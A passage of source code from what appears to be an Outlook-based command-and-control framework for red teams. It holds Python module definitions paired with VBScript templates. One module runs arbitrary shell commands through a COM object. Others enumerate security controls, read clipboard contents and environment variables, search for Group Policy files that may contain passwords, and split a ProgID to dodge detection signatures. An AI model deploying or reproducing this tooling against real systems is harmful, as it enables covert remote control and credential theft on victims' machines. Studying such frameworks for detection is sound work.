    """

    def __init__(self, templatepath, helpers):
        """Declare the option, help text and entry point.

        Args:
            templatepath: passed unchanged to ``SpecModule.__init__``.
            helpers: framework helper object, kept on ``self.helpers``.
        """
        self.helpers = helpers
        self.options = {
            'cmd': {
                "value": None,
                "required": True,
                "description": "Command to execute",
                "handler": None,
            },
        }
        self.help = """
Run a basic shell command via the installed com object
"""
        self.entry = 'run_shell_api'
        self.depends = []
        super().__init__(templatepath)

    def preprocess(self, agent):
        """Raise RuntimeError unless ``agent.api_verified`` equals True."""
        not_verified = (
            "API has not been verified, please run api_verify first to check that the API is working\n"
            "If it works it will mark the attribute api_verified to True\n"
            "To override you would need to use dbedit to change the value to true"
        )
        # Loose comparison kept on purpose: a stored 1 also counts as verified.
        if agent.api_verified != True:
            raise RuntimeError(not_verified)
================================================
FILE: functions/api/run_shell.txt
================================================
Function run_shell_api()
' Template: {{cmd}} is replaced by the server with the "cmd" option and lands inside the
' double quotes below (run_shell.py declares no handler for it).
' Creates the SpeculaApi.Specula COM object and returns whatever its RunShell method
' returns for that string. How RunShell executes the command is implemented in the COM
' DLL and is not visible in this template.
' With errors suppressed, a failed CreateObject leaves the return value unset.
on error resume next
Set SpeculaApi = window.external.OutlookApplication.CreateObject("SpeculaApi.Specula")
run_shell_api = SpeculaApi.RunShell("{{cmd}}")
End Function
================================================
FILE: functions/api/verify_api.py
================================================
from lib.core.specmodule import SpecModule
class Spec(SpecModule):
    """Server-side definition of the ``verify_api`` module.

    Has no options; its return handler records on the agent whether the
    template reported the COM object as usable.
    """

    def __init__(self, templatepath, helpers):
        """Set help text and entry point, then call ``SpecModule.__init__``.

        Args:
            templatepath: passed unchanged to ``SpecModule.__init__``.
            helpers: framework helper object, kept on ``self.helpers``.
        """
        self.helpers = helpers
        self.options = {}
        self.help = """
Checks if the API is working or not. If this returns an error you should investigate the api installation.
1. Is the dll present on system? The dll paths pushed through the install_api module can be found under info/dbdata.
2. Is the necesarry registry keys present on the host?
3. Consider re-running the api_install
4. Could it be an EDR blocking you :INSERT SCREAMING GIF HERE:
"""
        self.entry = 'api_verify'
        self.depends = []
        super().__init__(templatepath)

    def rethandler(self, agent, options, data):
        """Store the verification result on the agent.

        Only the exact strings "True" and "False" change
        ``agent.api_verified``; any other value leaves it as it was.
        """
        if data in ("False", "True"):
            agent.api_verified = data == "True"
================================================
FILE: functions/api/verify_api.txt
================================================
Function api_verify()
' Checks whether the SpeculaApi.Specula COM object can be created from inside Outlook.
' Returns True when CreateObject produced an object, otherwise False. Errors are
' suppressed, so a failed CreateObject leaves specApi unset and the Else branch runs.
' verify_api.py compares the result with the strings "True" / "False"; the conversion
' from this Boolean to a string happens outside this template - confirm where.
On error resume next
Set specApi = window.external.OutlookApplication.CreateObject("SpeculaApi.Specula")
If IsObject(specApi) Then
api_verify = True
else
api_verify = False
End if
End Function
================================================
FILE: functions/enumerate/host/list_amsiproviders.py
================================================
from lib.core.specmodule import SpecModule
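class Spec(SpecModule):
    """Server-side definition of the ``list_amsiproviders`` module.

    Holds only the operator help text and the template entry point; it
    declares no options, no dependencies and no return handler.
    """

    def __init__(self, templatepath, helpers):
        """Set help text and entry point, then call ``SpecModule.__init__``.

        Args:
            templatepath: passed unchanged to ``SpecModule.__init__``.
            helpers: framework helper object, kept on ``self.helpers``.
        """
        self.options = {}
        self.helpers = helpers
        # Every backslash is written doubled: a single one before "c" is an
        # invalid escape sequence that newer Python versions warn about.
        # The resulting help text is unchanged.
        self.help = """
Enumerates the AMSI Providers registered on the system.
Based on MS documentation:
https://techcommunity.microsoft.com/t5/exchange-team-blog/more-about-amsi-integration-with-exchange-server/ba-p/2572371
Gets the GUID and figures out the names from the Classes\\guid table in registry
It uses WbemScripting.SWbemNamedValueSet
- Add
- Add.__ProviderArchitecture
It uses WbemScripting.SWbemLocator
- ConnectServer(root\\cimv2)
- ConnectServer(root\\cimv2).EnumKey
- ConnectServer(root\\cimv2).GetStringValue
"""
        self.entry = 'list_amsiproviders'
        super().__init__(templatepath)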
================================================
FILE: functions/enumerate/host/list_amsiproviders.txt
================================================
Function list_amsiproviders()
' Lists the AMSI providers registered on the host.
' Enumerates the subkeys of HKLM\Software\Microsoft\AMSI\Providers (each subkey name is a
' provider GUID) and looks up the default value of HKLM\Software\Classes\CLSID\<guid> to
' get a readable name. Read-only: nothing is written.
' Returns a text report with one "Provider guid" / "CLSID name" pair per provider.
' Errors are suppressed, so a failed lookup yields an empty or repeated name, not an error.
On error resume next
' Registry type constants; none of them is referenced again in this function.
const REG_SZ = 1
const REG_EXPAND_SZ = 2
const REG_BINARY = 3
const REG_DWORD = 4
const REG_MULTI_SZ = 7
const REG_QWORD = 11
myoutput = "Registered AMSI providers found on system:" & vbCrLf
' Ask WMI for the 64-bit registry view.
Set oCtx = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemNamedValueSet")
oCtx.Add "__ProviderArchitecture", 64
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objreg = objLocator.ConnectServer(".","root\cimv2","","",,,,oCtx).Get("StdRegProv")
' 2147483650 is HKEY_LOCAL_MACHINE.
objreg.EnumKey 2147483650, "Software\Microsoft\AMSI\Providers", arrKeys
For Each subkey in arrKeys
myoutput = myoutput & "Provider guid: " & subkey & vbCrLf
' strValue is not cleared between iterations; with errors suppressed a failed read
' can leave the previous provider's name in place.
objReg.GetStringValue 2147483650,"Software\Classes\CLSID\" & subkey,"",strValue
myoutput = myoutput & "CLSID name: " & strValue & vbCrLf & vbCrLf
Next
list_amsiproviders = myoutput
End Function
================================================
FILE: functions/enumerate/host/list_applocker.py
================================================
from lib.core.specmodule import SpecModule
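class Spec(SpecModule):
    """Server-side definition of the ``list_applocker`` module.

    Holds only the operator help text and the template entry point; it
    declares no options and no return handler.
    """

    def __init__(self, templatepath, helpers):
        """Set help text and entry point, then call ``SpecModule.__init__``.

        Args:
            templatepath: passed unchanged to ``SpecModule.__init__``.
            helpers: framework helper object, kept on ``self.helpers``.
        """
        self.options = {}
        self.helpers = helpers
        # Every backslash is written doubled: a single one before "c" is an
        # invalid escape sequence that newer Python versions warn about.
        # The resulting help text is unchanged.
        self.help = """
Enumerates the status of AppLocker.
It returns one of the following statuses:
- Not Enabled
- Auditing
- Enforced
It uses WbemScripting.SWbemLocator
- ConnectServer(root\\cimv2)
- ConnectServer(root\\cimv2).EnumKey
- ConnectServer(root\\cimv2).GetDwordValue
- ConnectServer(root\\cimv2).GetStringValue
"""
        self.entry = 'list_applocker'
        self.depends = []
        super().__init__(templatepath)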
================================================
FILE: functions/enumerate/host/list_applocker.txt
================================================
Function list_applocker()
' Reports the AppLocker policy state found in the registry. Read-only.
' Enumerates the rule-collection subkeys of HKLM\Software\Policies\Microsoft\Windows\SrpV2\,
' reads each collection's EnforcementMode (1 is reported as "Enforced", 0 as "Auditing",
' a failed read as "Not Enabled") and appends the "Value" string of every rule subkey.
' Returns "AppLocker disabled!" when the SrpV2 key cannot be enumerated, otherwise the
' per-collection modes followed by the collected rule text.
On error resume next
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objReg = objLocator.ConnectServer(".", "root\cimv2").Get("StdRegProv")
ALlog = "Enumerate AppLocker status:" & vbCrLf
KeyPathAL = "Software\Policies\Microsoft\Windows\SrpV2\"
' 2147483650 is HKEY_LOCAL_MACHINE; a non-zero return code means the key was not readable.
results = objReg.EnumKey(2147483650, KeyPathAL, arrSubkeysAL)
If results <> 0 Then
ALlog = ALlog & "AppLocker disabled!"
list_applocker = ALlog
Else
ALlog = ALlog & "AppLocker enabled!" & vbCrlf
For Each strSubkeyAL In arrSubkeysAL
status = objReg.GetDwordValue(2147483650, KeyPathAL & strSubkeyAL, "EnforcementMode", sectionMode)
If status <> 0 Then
val = "Not Enabled"
Else
' val is not reset per collection: a mode other than 0 or 1 keeps the label of the
' previous collection.
If sectionMode = 1 Then
val = "Enforced"
ElseIf sectionMode = 0 Then
val = "Auditing"
End If
' Rules are collected only for collections whose EnforcementMode could be read.
resul = objReg.EnumKey(2147483650, KeyPathAL & strSubKeyAL, arrSectionSub)
AppLockerRules = AppLockerRules & "AppLocker Rule section: " & strSubKeyAL & vbCrlf
For Each strSub in arrSectionSub
res = objReg.GetStringValue(2147483650, KeyPathAL & strSubKeyAL & "\" & strSub, "Value", outrules)
AppLockerRules = AppLockerRules & outrules & vbCrlf
Next
End If
ALlog = ALlog & "EnforcementMode for " & strSubKeyAl & " Is " & val & vbCrlf
Next
list_applocker = ALlog & vbCrlf & AppLockerRules
End If
End Function
================================================
FILE: functions/enumerate/host/list_autoruns.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring
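class Spec(SpecModule):
    """Server-side definition of the ``list_autoruns`` module.

    Declares one option, ``username``, which is always overwritten with the
    agent's registered username before the template is rendered.
    """

    def __init__(self, templatepath, helpers):
        """Declare option, help text, entry point and helper dependencies.

        Args:
            templatepath: passed unchanged to ``SpecModule.__init__``.
            helpers: framework helper object, kept on ``self.helpers``.
        """
        self.options = {}
        self.helpers = helpers
        # Every backslash is written doubled: a single one before "c" is an
        # invalid escape sequence that newer Python versions warn about.
        # The resulting help text is unchanged.
        self.help = """
Enumerates autoruns defined on the agent
It uses WbemScripting.SWbemNamedValueSet
- Add
- Add.__ProviderArchitecture
It uses WbemScripting.SWbemLocator
- ConnectServer(root\\cimv2)
- ConnectServer(root\\cimv2).EnumValues
- ConnectServer(root\\cimv2).GetDwordValue
- ConnectServer(root\\cimv2).GetStringValue
- ConnectServer(root\\cimv2).GetExpandedStringValue
- ConnectServer(root\\cimv2).GetBinaryValue
- ConnectServer(root\\cimv2).GetMultiStringValue
- ConnectServer(root\\cimv2).GetQWORDValue
It uses Scripting.FileSystemObject
- GetFolder
- GetFolder().Files
- GetBaseName
- GetExtensionName
"""
        self.entry = 'list_autoruns'
        self.depends = ['./helperFunctions/Getallregvalues.txt', './helperFunctions/Getregvalue.txt', './helperFunctions/dir_lister.txt']
        # "Dummy" is only a placeholder; preprocess() replaces it.
        self.options['username'] = {
            "value": "Dummy",
            "required": True,
            "description": "Username, autoresolves to agents registered username",
            "handler": quotedstring,
            "hidden": False
        }
        super().__init__(templatepath)

    def preprocess(self, agent):
        """Set the ``username`` option to ``agent.username``."""
        self.options['username']['value'] = agent.username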
================================================
FILE: functions/enumerate/host/list_autoruns.txt
================================================
Function list_autoruns()
' Template: {{username}} is replaced by the server with the agent's registered username
' (list_autoruns.py, quotedstring handler).
' Builds a text report of common autostart locations: per-user and machine-wide registry
' keys, plus the all-users and per-user Startup folders. Read-only.
' Relies on GetAllRegValues, GetRegValue and dir_lister from helperFunctions (not shown
' here). In the calls below 64 / 32 appear to select the registry view and 2147483649 /
' 2147483650 are HKEY_CURRENT_USER / HKEY_LOCAL_MACHINE - confirm the argument meaning
' against the helpers.
' NOTE(review): some paths below put a name that is normally a registry value (load, Shell,
' Userinit) in the key-path position; verify against the helper semantics before relying
' on the output as a complete inventory.
On error resume next
list_autoruns = "HKCU Autoruns:" & vbCrLf
list_autoruns = list_autoruns & GetAllRegValues("HKCU", "Software\Microsoft\Windows\CurrentVersion\run", 64, 2147483649)
list_autoruns = list_autoruns & GetAllRegValues("HKCU", "Software\Microsoft\Windows\CurrentVersion\runonce", 64, 2147483649) & vbCrLf
list_autoruns = list_autoruns & GetAllRegValues("HKCU", "Software\Microsoft\Windows\CurrentVersion\RunServices", 64, 2147483649) & vbCrLf
list_autoruns = list_autoruns & GetAllRegValues("HKCU", "Software\Microsoft\Windows\CurrentVersion\RunServicesOnce", 64, 2147483649) & vbCrLf
list_autoruns = list_autoruns & GetAllRegValues("HKCU", "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run", 64, 2147483649) & vbCrLf
list_autoruns = list_autoruns & GetAllRegValues("HKCU", "Software\Microsoft\Windows NT\CurrentVersion\Windows\load", 64, 2147483649) & vbCrLf
list_autoruns = list_autoruns & GetAllRegValues("HKCU", "Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell", 64, 2147483649) & vbCrLf
list_autoruns = list_autoruns & vbCrLf
'HKLM
' Run and RunOnce (and RunOnceEx) are read in both the 64-bit and the 32-bit view.
list_autoruns = list_autoruns & "HKLM Autoruns:" & vbCrLf
list_autoruns = list_autoruns & GetAllRegValues("HKLM", "Software\Microsoft\Windows\CurrentVersion\Run", 64, 2147483650) & vbCrLf
list_autoruns = list_autoruns & GetAllRegValues("HKLM", "Software\Microsoft\Windows\CurrentVersion\Run", 32, 2147483650) & vbCrLf
list_autoruns = list_autoruns & GetAllRegValues("HKLM", "Software\Microsoft\Windows\CurrentVersion\RunOnce", 64, 2147483650) & vbCrLf
list_autoruns = list_autoruns & GetAllRegValues("HKLM", "Software\Microsoft\Windows\CurrentVersion\RunOnce", 32, 2147483650) & vbCrLf
list_autoruns = list_autoruns & GetAllRegValues("HKLM", "Software\Microsoft\Windows\CurrentVersion\RunOnceEx", 64, 2147483650) & vbCrLf
list_autoruns = list_autoruns & GetAllRegValues("HKLM", "Software\Microsoft\Windows\CurrentVersion\RunOnceEx", 32, 2147483650) & vbCrLf
list_autoruns = list_autoruns & GetAllRegValues("HKLM", "Software\Microsoft\Windows\CurrentVersion\RunServicesOnce", 64, 2147483650) & vbCrLf
list_autoruns = list_autoruns & GetAllRegValues("HKLM", "Software\Microsoft\Windows\CurrentVersion\RunServices", 64, 2147483650) & vbCrLf
list_autoruns = list_autoruns & GetAllRegValues("HKLM", "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run", 64, 2147483650) & vbCrLf
' Single named values rather than whole keys.
list_autoruns = list_autoruns & GetRegValue("HKLM", "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Notify", 64, 2147483650, "STDREGPROV") & vbCrLf & vbCrLf
list_autoruns = list_autoruns & GetRegValue("HKLM", "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Userinit", "Notify", 64, 2147483650, "STDREGPROV") & vbCrLf & vbCrLf
list_autoruns = list_autoruns & GetRegValue("HKLM", "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Shell", "Notify", 64, 2147483650, "STDREGPROV") & vbCrLf & vbCrLf
list_autoruns = list_autoruns & GetRegValue("HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad", "WebCheck", 64, 2147483650, "STDREGPROV") & vbCrLf & vbCrLf
list_autoruns = list_autoruns & GetRegValue("HKLM", "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows", "AppInit_DLLs", 64, 2147483650, "STDREGPROV") & vbCrLf & vbCrLf
'Files
' The per-user Startup path is built from a hard-coded C:\Users\ prefix plus {{username}}.
list_autoruns = list_autoruns & "FILE Autoruns:" & vbCrLf
list_autoruns = list_autoruns & dir_lister("C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp", 0, False, "*", "*", True, "mb") & vbCrLf
list_autoruns = list_autoruns & dir_lister("C:\Users\" & {{username}} & "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup", 0, False, "*", "*", True, "mb") & vbCrLf
End Function
================================================
FILE: functions/enumerate/host/list_basic.py
================================================
from lib.core.specmodule import SpecModule
from datetime import datetime
class Spec(SpecModule):
    """Server-side definition of the ``list_basic`` module.

    Has no options; its return handler copies the reported host and user
    name onto the agent record.
    """

    def __init__(self, templatepath, helpers):
        """Set help text and entry point, then call ``SpecModule.__init__``.

        Args:
            templatepath: passed unchanged to ``SpecModule.__init__``.
            helpers: framework helper object, kept on ``self.helpers``.
        """
        self.helpers = helpers
        self.options = {}
        self.help = """
Enumerates basic details about the host. It retrieves:
- %Computername%
- %Username%
- %Userdomain%
- %Userprofile%
- %Userdnsdomain%
- %Logonserver%
- %Homepath%
It uses Wscript.Shell
- ExpandEnvironmentStrings
"""
        self.entry = 'list_basic'
        self.depends = []
        super().__init__(templatepath)

    def rethandler(self, agent, options, data):
        """Update ``agent.hostname`` and ``agent.username`` from ``data``.

        ``data`` is split on whitespace; token 3 becomes the hostname and
        token 1 the username, matching the "UserName: x / ComputerName: y"
        layout produced by list_basic.txt. Agents whose hostname contains
        "-VSTO" are left untouched. Shorter output raises IndexError.
        NOTE(review): a user name containing a space would shift the token
        positions - confirm whether that can occur.
        """
        if "-VSTO" in agent.hostname:
            # VSTO agents keep the values they registered with.
            return
        agent.hostname = data.split()[3]
        agent.username = data.split()[1]
================================================
FILE: functions/enumerate/host/list_basic.txt
================================================
Function list_basic()
' Collects basic host and user details by expanding environment variables. Read-only.
' Returns one "Label: value" line each for user name, computer name, user domain, user
' DNS domain, logon server, home path and user profile. list_basic.py in this repository
' splits this output on whitespace and reads tokens 1 and 3, so the order of the first
' two fields matters.
On error resume next
' The ProgID "Wscript.Shell" is assembled from three string pieces, so the complete
' name does not appear as one literal in this template - relevant when writing
' content signatures for it.
Set sh = window.external.OutlookApplication.CreateObject("Wsc" & "ript.Sh" & "ell")
gds = sh.ExpandEnvironmentStrings("%COMPUTERNAME%")
huj = sh.ExpandEnvironmentStrings("%USERNAME%")
imd = sh.ExpandEnvironmentStrings("%USERDOMAIN%")
fvy = sh.ExpandEnvironmentStrings("%USERPROFILE%")
udd = sh.ExpandEnvironmentStrings("%USERDNSDOMAIN%")
fah = sh.ExpandEnvironmentStrings("%LOGONSERVER%")
hyf = sh.ExpandEnvironmentStrings("%HOMEPATH%")
' An unexpanded variable comes back unchanged; that case is reported as "WORKGROUP".
If udd = "%USERDNSDOMAIN%" Then
udd = "WORKGROUP"
End If
list_basic = "UserName: " & huj & vbCrLf & "ComputerName: " & gds & vbCrLf & "UserDomain: " & imd & vbCrLF & "UserDNSDomain: " & udd & vbCrLF & "Logon server: " & fah & vbCrLF & "Homepath: " & hyf & vbCrLF & "UserProfile: " & fvy & vbCrLF & vbCrLf
End Function
================================================
FILE: functions/enumerate/host/list_boottime.py
================================================
from lib.core.specmodule import SpecModule
class Spec(SpecModule):
    """Server-side definition of the ``list_boottime`` module.

    Holds only the operator help text and the template entry point; it
    declares no options and no return handler.
    """

    def __init__(self, templatepath, helpers):
        """Set help text and entry point, then call ``SpecModule.__init__``.

        Args:
            templatepath: passed unchanged to ``SpecModule.__init__``.
            helpers: framework helper object, kept on ``self.helpers``.
        """
        self.helpers = helpers
        self.options = {}
        self.depends = []
        self.entry = 'list_boottime'
        self.help = """
Enumerates last boot time using WMI.
It queries LastBootUpTime from Win32_OperatingSystem and converts it to a readable format.
It uses WbemScripting.SWbemLocator
- Query: Select LastBootUpTime from Win32_OperatingSystem
"""
        super().__init__(templatepath)
================================================
FILE: functions/enumerate/host/list_boottime.txt
================================================
Function list_boottime()
' Reports the last boot time of the host, read through WMI. Read-only.
' Returns "Last Boot time: YYYY/MM/DD HH:MM:SS".
On error resume next
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objWMIService = objLocator.ConnectServer(".", "root\cimv2")
Set col = objWMIService.ExecQuery ("Select LastBootUpTime from Win32_OperatingSystem")
' If the query returns several rows, the last one wins.
For Each obj in col
list_boottime = obj.LastBootUpTime
Next
' The raw value is sliced by position: 4 digits year, then 2 each for month, day,
' hour, minute and second. Anything after position 14 is dropped.
list_boottime = ( Left(list_boottime, 4) _
& "/" & Mid(list_boottime, 5, 2) _
& "/" & Mid(list_boottime, 7, 2) _
& " " & Mid(list_boottime, 9, 2) _
& ":" & Mid(list_boottime,11, 2) _
& ":" & Mid(list_boottime,13, 2))
list_boottime = "Last Boot time: " & list_boottime
End Function
================================================
FILE: functions/enumerate/host/list_clipboard.py
================================================
from lib.core.specmodule import SpecModule
from datetime import datetime
class Spec(SpecModule):
    """Server-side definition of the ``list_clipboard`` module.

    Holds only the operator help text and the template entry point; it
    declares no options and no return handler.
    """

    def __init__(self, templatepath, helpers):
        """Set help text and entry point, then call ``SpecModule.__init__``.

        Args:
            templatepath: passed unchanged to ``SpecModule.__init__``.
            helpers: framework helper object, kept on ``self.helpers``.
        """
        self.helpers = helpers
        self.options = {}
        self.depends = []
        self.entry = 'list_clipboard'
        self.help = """
Creates a html object and retrieved the content from the clipboard
It uses htmlfile
- ParentWindow.ClipboardData.GetData()
"""
        super().__init__(templatepath)
================================================
FILE: functions/enumerate/host/list_clipboard.txt
================================================
Function list_clipboard()
' Reads the text currently on the clipboard of the logged-on user.
' Creates an "htmlfile" COM object and asks its parent window's ClipboardData for the
' "text" format. Returns "Clipboard data retrieved: " followed by that text; with errors
' suppressed, a failed read returns only the label.
' Defender note: clipboard content frequently holds passwords and tokens copied from
' password managers, so this output should be treated as sensitive data.
On error resume next
Set html = window.external.OutlookApplication.CreateObject("htmlfile")
text = html.ParentWindow.ClipboardData.GetData("text")
list_clipboard = "Clipboard data retrieved: " & vbCrLf & text
End Function
================================================
FILE: functions/enumerate/host/list_environmentvariables.py
================================================
from lib.core.specmodule import SpecModule
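class Spec(SpecModule):
    """Server-side definition of the ``list_environmentvariables`` module.

    Holds the operator help text, the template entry point and one helper
    dependency; it declares no options and no return handler.
    """

    def __init__(self, templatepath, helpers):
        """Set help text, entry point and dependency list.

        Args:
            templatepath: passed unchanged to ``SpecModule.__init__``.
            helpers: framework helper object, kept on ``self.helpers``.
        """
        self.options = {}
        self.helpers = helpers
        # Every backslash is written doubled: a single one before "c" is an
        # invalid escape sequence that newer Python versions warn about.
        # The resulting help text is unchanged.
        self.help = """
Lists interesting registry values that might be passwords
or other interesting configuration settings
It uses WbemScripting.SWbemNamedValueSet
- Add
- Add.__ProviderArchitecture
It uses WbemScripting.SWbemLocator
- ConnectServer(root\\cimv2)
- ConnectServer(root\\cimv2).EnumValues
- ConnectServer(root\\cimv2).GetDwordValue
- ConnectServer(root\\cimv2).GetStringValue
- ConnectServer(root\\cimv2).GetExpandedStringValue
- ConnectServer(root\\cimv2).GetBinaryValue
- ConnectServer(root\\cimv2).GetMultiStringValue
- ConnectServer(root\\cimv2).GetQWORDValue
"""
        self.entry = 'list_environmentvariables'
        self.depends = ['./helperFunctions/Getallregvalues.txt']
        super().__init__(templatepath)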
================================================
FILE: functions/enumerate/host/list_environmentvariables.txt
================================================
Function list_environmentvariables()
' Dumps the environment variables stored in the registry. Read-only.
' Reads three keys through GetAllRegValues (helper from helperFunctions/Getallregvalues.txt,
' not shown here): the machine-wide Session Manager\Environment key in HKLM, and the
' per-user Environment and Volatile Environment keys in HKCU.
' Returns the three helper results separated by blank lines.
' Defender note: secrets placed in environment variables (API keys, connection strings)
' are readable this way by any code running as the user.
On error resume next
list_environmentvariables = list_environmentvariables & GetAllRegValues("HKLM", "SYSTEM\CurrentControlSet\Control\Session Manager\Environment", 64, 2147483650) & vbCrLF & vbCrLF
list_environmentvariables = list_environmentvariables & GetAllRegValues("HKCU", "Environment", 64, 2147483649) & vbCrLF & vbCrLF
list_environmentvariables = list_environmentvariables & GetAllRegValues("HKCU", "Volatile Environment", 64, 2147483649) & vbCrLF
End Function
================================================
FILE: functions/enumerate/host/list_gpp.py
================================================
from lib.core.specmodule import SpecModule
class Spec(SpecModule):
    """Server-side definition of the ``list_gpp`` module.

    Holds only the operator help text and the template entry point; it
    declares no options and no return handler.
    """

    def __init__(self, templatepath, helpers):
        """Set help text and entry point, then call ``SpecModule.__init__``.

        Args:
            templatepath: passed unchanged to ``SpecModule.__init__``.
            helpers: framework helper object, kept on ``self.helpers``.
        """
        self.helpers = helpers
        self.options = {}
        self.depends = ['./helperFunctions/dir_lister.txt']
        self.help = """
Lists Group Policy Preferences files local on host that could contain passwords, configurations or other data.
It looks inside C:\\Windows\\System32\\GroupPolicy\\DataStore\\0\\sysvol\\domain.com\\Policies\\ on the local host for the following files
Groups.xml
Drives.xml
Services.xml
ScheduledTasks.xml
Datasources.xml
Printers.xml
It uses Wscript.Shell
- ExpandEnvironmentStrings
It uses Scripting.FileSystemObject
- FolderExists
- GetFolder
- GetFolder().Files
- GetBaseName
- GetExtensionName
"""
        self.entry = 'list_gpp'
        # NOTE(review): this second assignment replaces the list set above, so
        # the value in effect when SpecModule.__init__ runs is the empty list.
        # Confirm which of the two assignments is intended.
        self.depends = []
        super().__init__(templatepath)
================================================
FILE: functions/enumerate/host/list_gpp.txt
================================================
Function list_gpp()
' Looks for locally cached Group Policy Preferences files. Read-only.
' Builds the path C:\Windows\sysnative\GroupPolicy\DataStore\0\sysvol\<USERDNSDOMAIN>\Policies\
' and, when that folder exists, calls dir_lister (helper, not shown here) once per file
' name of interest: Groups, Drives, Services, ScheduledTasks, Datasources, Printers (.xml).
' Returns the search results, or a "not found" message naming the path.
' Defender note: these preference files are the ones that historically could carry
' embedded credentials; cached copies on endpoints are worth auditing and cleaning up.
On error resume next
Set sh = window.external.OutlookApplication.CreateObject("Wscript.Shell")
Set fs = window.external.OutlookApplication.CreateObject("Scripting.FileSystemObject")
dom = sh.ExpandEnvironmentStrings("%USERDNSDOMAIN%")
' "sysnative" is used instead of System32, unlike the path quoted in the module help text.
polpath = "C:\Windows\sysnative\GroupPolicy\DataStore\0\sysvol\" & dom & "\Policies\"
If fs.FolderExists(polpath) = True Then
output = "Found " & "C:\Windows\sysnative\GroupPolicy\DataStore\0\sysvol\" & dom & "\Policies\" & vbCrLf
output = output & "Searching for Groups.xml" & vbCrLf & dir_lister(polpath, 0, 4, "xml", "Groups", True, "mb") & vbCrLf
output = output & "Searching for Drives.xml" & vbCrLf &dir_lister(polpath, 0, 4, "xml", "Drives", True, "mb") & vbCrLf
output = output & "Searching for Services.xml" & vbCrLf &dir_lister(polpath, 0, 4, "xml", "Services", True, "mb") & vbCrLf
output = output & "Searching for ScheduledTasks.xml" & vbCrLf &dir_lister(polpath, 0, 4, "xml", "ScheduledTasks", True, "mb") & vbCrLf
output = output & "Searching for Datasources.xml" & vbCrLf &dir_lister(polpath, 0, 4, "xml", "Datasources", True, "mb") & vbCrLf
output = output & "Searching for Printers.xml" & vbCrLf &dir_lister(polpath, 0, 4, "xml", "Printers", True, "mb") & vbCrLf
else
output = "Local Policy Folder not found at " & polpath
End If
list_gpp = output
End Function
================================================
FILE: functions/enumerate/host/list_hostsfile.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring
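class Spec(SpecModule):
    """Server-side definition of the ``list_hostsfile`` module.

    Holds only the operator help text and the template entry point; it
    declares no options and no return handler.
    """

    def __init__(self, templatepath, helpers):
        """Set help text and entry point, then call ``SpecModule.__init__``.

        Args:
            templatepath: passed unchanged to ``SpecModule.__init__``.
            helpers: framework helper object, kept on ``self.helpers``.
        """
        self.options = {}
        self.helpers = helpers
        # Every backslash in the Windows path is written doubled: the single
        # ones formed invalid escape sequences that newer Python versions warn
        # about. The resulting help text is unchanged.
        self.help = """
This module reads the content of the hostsfile under
C:\\windows\\system32\\drivers\\etc\\hosts and outputs to the log.
This might reveal specific hosts or other domains etc.
It uses Scripting.FileSystemObject
- OpenTextFile
- OpenTextFile().ReadFile.ReadAll
"""
        self.entry = 'list_hostsfile'
        self.depends = []
        super().__init__(templatepath)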
================================================
FILE: functions/enumerate/host/list_hostsfile.txt
================================================
Function list_hostsfile()
' Returns the content of the local hosts file. Read-only.
' The path is hard-coded to C:\Windows\System32\drivers\etc\hosts. The file is opened
' with mode 1 (for reading) and read in full; when it does not exist a fixed message is
' returned in place of the content.
On error resume next
Set fs = window.external.OutlookApplication.CreateObject("Scripting.FileSystemObject")
If fs.FileExists("C:\Windows\System32\drivers\etc\hosts") = True Then
' The text stream is not closed explicitly in this function.
set ReadFile = fs.OpenTextFile("C:\Windows\System32\drivers\etc\hosts", 1)
content = ReadFile.ReadAll
else
content = "Hosts file not found - WTF!"
End If
list_hostsfile = "C:\Windows\System32\drivers\etc\hosts:" & vbCrLf & content
End Function
================================================
FILE: functions/enumerate/host/list_hotfixes.py
================================================
from lib.core.specmodule import SpecModule
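class Spec(SpecModule):
    """Server-side definition of the ``list_hotfixes`` module.

    Holds only the operator help text and the template entry point; it
    declares no options and no return handler.
    """

    def __init__(self, templatepath, helpers):
        """Set help text and entry point, then call ``SpecModule.__init__``.

        Args:
            templatepath: passed unchanged to ``SpecModule.__init__``.
            helpers: framework helper object, kept on ``self.helpers``.
        """
        self.options = {}
        self.helpers = helpers
        # The backslash is written doubled: a single one before "c" is an
        # invalid escape sequence that newer Python versions warn about.
        # The resulting help text is unchanged.
        self.help = """
Using WMI it enumerates the installed hotfixes.
The Win32_QuickFixEngineering is used (Same as the Powershell cmdlet get-hotfix)
It uses WbemScripting.SWbemLocator
- ConnectServer(root\\cimv2)
- Query: Select * from Win32_QuickFixEngineering
"""
        self.entry = 'list_hotfixes'
        self.depends = []
        super().__init__(templatepath)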
================================================
FILE: functions/enumerate/host/list_hotfixes.txt
================================================
Function list_hotfixes()
' Lists installed Windows hotfixes through WMI. Read-only.
' Queries Win32_QuickFixEngineering and returns a header line followed by one
' "HotFixID - Description - InstalledOn" line per result.
' Defender note: the same inventory shows which updates are missing, so patch level is
' visible to any code running as the user.
On Error Resume Next
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objWMIService = objLocator.ConnectServer(".", "root\cimv2")
' Flag value 48 combines "return immediately" (16) and "forward only" (32).
Set colItems = objWMIService.ExecQuery("Select * from Win32_QuickFixEngineering",,48)
list_hotfixes = "HotFixID - Description - InstalledOn" & vbCrLf
For Each objItem in colItems
list_hotfixes = list_hotfixes & objItem.HotFixID & " - " & objItem.Description & " - " & objItem.InstalledOn & vbCrLf
Next
End Function
================================================
FILE: functions/enumerate/host/list_installedapps.py
================================================
from lib.core.specmodule import SpecModule
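class Spec(SpecModule):
    """Module descriptor for ``list_installedapps``: help text, entry point, dependencies."""

    def __init__(self, templatepath, helpers):
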